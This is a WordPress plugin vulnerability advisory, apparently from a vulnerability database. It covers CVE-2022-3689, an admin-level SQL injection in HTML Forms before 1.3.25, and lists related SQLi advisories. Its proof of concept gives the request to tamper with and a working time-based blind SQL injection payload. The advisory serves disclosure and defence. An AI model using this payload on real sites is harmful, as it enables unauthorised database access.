HTML Forms < 1.3.25 – Admin+ SQLi | CVE 2022-3689 | Plugin Vulnerabilities

Description

The plugin does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users

Proof of Concept

Access the submission page on https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions

Capture the request after performing a Move to Trash action, replace the Submission ID with the SQLi payload, e.g

_hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033

Affects Plugins

Fixed in 1.3.25

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter

Verified

Yes

WPVDB ID

e9c551a3-7482-4421-8197-5886d028776c

Timeline

Publicly Published

2022-11-07 (about 3 years ago)

Added

2022-11-07 (about 3 years ago)

Last Updated

2022-11-07 (about 3 years ago)

Other

Published

Title

Published

2025-05-19

Title

RSVPMarker < 11.5.7 - Authenticated (Contributor+) SQL Injection

Published

2025-02-17

Title

Simple Signup Form <= 1.6.5 - Authenticated (Contributor+) SQL Injection

Published

2015-10-09

Title

Limit Attempts < 1.1.1 - SQL Injection

Published

2025-02-11

Title

LTL Freight Quotes – XPO Edition < 4.3.8 - Unauthenticated SQL Injection

Published

2025-08-26

Title

Advance Seat Reservation Management for WooCommerce <= 3.1 - Unauthenticated SQL Injection